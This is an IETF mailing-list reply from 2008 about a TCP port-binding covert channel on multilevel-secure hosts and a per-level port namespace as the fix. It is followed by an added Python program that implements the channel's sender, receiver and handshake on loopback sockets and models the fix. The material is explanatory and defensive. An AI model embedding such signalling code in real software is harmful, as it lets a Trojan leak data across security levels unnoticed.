
Re: Secdir Review of draft-stjohns-sipso-05

2008-10-02 20:17:28
At 07:01 PM 10/2/2008, Joe Touch wrote:
A second single level process at SECRET also attempts to do a passive
open to the same port - but gets blocked because the port resource is
being held by the TOP SECRET process. The SECRET process now has one bit
of information about the TOP SECRET part of the host. By grabbing and
releasing port resources, the TS process can signal data to processes at
lower security levels.

Understood. However, the lower security process can't know whether it's
the TS process doing this or some other reason (port blocked, e.g.); all
it knows is that it can't connect at the level it wants on
the port it wants.

MLS systems have a couple of mandatory access rules - one of them is that 
processes at higher levels can read things at lower levels (assuming the 
discretionary access controls permit it).  This includes, specifically, programs.

Say you have an attacker - a contract programmer hired by Coke to write a 
couple of utility programs.  He writes two - one program that almost everyone 
will use at some point, another for his own personal use.  The former includes 
the signaling code to twiddle TCP ports.  The latter contains the code to 
monitor that twiddling.  The attacker completes his program, checks it in for 
use.  Mr VP comes along, logs in at TOP SECRET and runs the utility program - 
maybe it's a spell checker - and triggers the signaling process.  The utility 
program has access to everything Mr VP has at that level.  One of the things the 
Trojan horse finds is the formula for New Coke (tm).. :-)  The attacker (at the 
UNCLASSIFIED level) captures the signals and ultimately the formula and sells 
the formula to the highest bidder.


The signaling program uses 10 ports - two to signal the presence or absence of 
data - and 8 others to represent one byte of data.  (See the old 1822 protocol 
definitions).


...
The fix was to virtualize TCP so that there was a complete set of TCP
ports per distinct security domain.

I agree that this fixes your problem, but what it does is create a new
naming dimension to the entire Internet, and I don't think that this is
feasible.

Naming?  Not really.  Addressing maybe - but that's - as I said before - pretty 
local to only those hosts that implement MLS.


Perhaps you'd prefer to black-hole the SYNs at the wrong security level,
which would still modify 793, but would not create the naming dimension
problem that concerns me...

Define "wrong security level" - both the attacker and victim are operating at 
their own security levels, it's just the resource interactions that lead to the 
covert channel.

Which SYNs - (need an exact filter definition here please) would you black-hole, 
and how would that solve anything?
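The ten-port signaling scheme described in this message, and the per-level port namespace proposed as the fix, modelled in Python. This is an added example and not code from the thread or from draft-stjohns-sipso; the port numbers (base 40000), the READY/ACK names for the two control ports, the level names, and the lock-step single-process run are assumptions made here. The high side signals by holding TCP ports; the low side learns one bit per port from whether its own bind() fails with EADDRINUSE, which is all the information the thread says it has.

```python
"""Port-binding covert channel from the thread (added example, not the
thread's or the draft's code).  Ten ports as in the post: READY (high side
has a byte up), ACK (low side has read it) and eight data ports, one per
bit.  Base port, level names and the single-process lock-step run are
assumptions of this example."""
import socket


class SharedPorts:
    """One TCP port namespace for the whole host (what an RFC 793 host has).
    Uses real sockets on loopback so EADDRINUSE is the kernel's own verdict;
    the `level` argument is ignored because the namespace is not partitioned."""

    def __init__(self, host="127.0.0.1"):
        self.host, self.held = host, {}

    def hold(self, level, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((self.host, port))        # no SO_REUSEADDR: a second bind must fail
        self.held[port] = s

    def release(self, level, port):
        self.held.pop(port).close()

    def is_held(self, level, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.bind((self.host, port))
            return False                 # bind worked: nobody holds the port
        except OSError:
            return True                  # EADDRINUSE: the other side holds it
        finally:
            s.close()


class FakeSharedPorts:
    """In-memory namespace with the same shared semantics, for running offline."""

    def __init__(self):
        self.held = set()

    def hold(self, level, port):
        if port in self.held:
            raise OSError("address already in use")
        self.held.add(port)

    def release(self, level, port):
        self.held.discard(port)

    def is_held(self, level, port):
        return port in self.held


class PerLevelPorts:
    """The fix from the thread: a complete set of ports per security level, so a
    probe at one level never observes a port held at another."""

    def __init__(self):
        self.held = set()

    def hold(self, level, port):
        self.held.add((level, port))

    def release(self, level, port):
        self.held.discard((level, port))

    def is_held(self, level, port):
        return (level, port) in self.held


class Party:
    """Port layout both programs agree on: READY, ACK, then eight data ports."""

    def __init__(self, ns, level, base):
        self.ns, self.level = ns, level
        self.ready, self.ack = base, base + 1
        self.data = [base + 2 + bit for bit in range(8)]

    def hold(self, port):
        self.ns.hold(self.level, port)

    def release(self, port):
        self.ns.release(self.level, port)

    def probe(self, port):
        return self.ns.is_held(self.level, port)


class HighSide(Party):
    """Runs inside the Trojaned utility at the victim's (high) level."""
    _held = ()                           # data ports held for the current byte

    def load(self, value):
        self._held = [p for bit, p in enumerate(self.data) if (value >> bit) & 1]
        for p in self._held:
            self.hold(p)
        self.hold(self.ready)            # raise READY last, once the bits are stable

    def clear(self):
        self.release(self.ready)         # drop READY first, then the data bits
        for p in self._held:
            self.release(p)
        self._held = ()


class LowSide(Party):
    """The attacker's monitor at the low level: sees only bind success/failure."""

    def read(self):
        value = sum(1 << bit for bit, p in enumerate(self.data) if self.probe(p))
        self.hold(self.ack)              # ACK tells the high side the byte was consumed
        return value

    def done(self):
        self.release(self.ack)


def transfer(message, ns, base=40000, high="TOP SECRET", low="UNCLASSIFIED"):
    """Lock-step run of the handshake in one process (in the attack these are
    two processes polling each other).  Returns what the low side recovered."""
    tx, rx = HighSide(ns, high, base), LowSide(ns, low, base)
    out = bytearray()
    for b in message:
        tx.load(b)
        if not rx.probe(rx.ready):       # per-level ports: READY never appears
            tx.clear()
            break
        out.append(rx.read())
        if tx.probe(tx.ack):
            tx.clear()
        rx.done()
    return bytes(out)


def free_base(host="127.0.0.1", start=40000, count=10):
    """Find `count` consecutive loopback ports nobody is currently using."""
    ns, base = SharedPorts(host), start
    while any(ns.is_held("probe", p) for p in range(base, base + count)):
        base += count
    return base


if __name__ == "__main__":
    formula = b"New Coke"                # constructed sample payload
    print("shared ports (793 host):", transfer(formula, SharedPorts(), free_base()))
    print("per-level ports (fix):  ", transfer(formula, PerLevelPorts()))
```

With the shared namespace the low side reads the payload back byte for byte; with one port set per level the READY port is never visible below, so the receiver gets nothing and the high side's holds are invisible. The SharedPorts class binds real loopback sockets, so the demonstration is the kernel's EADDRINUSE behaviour rather than a simulation of it.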



_______________________________________________
Ietf mailing list
Ietf(_at_)ietf(_dot_)org
https://www.ietf.org/mailman/listinfo/ietf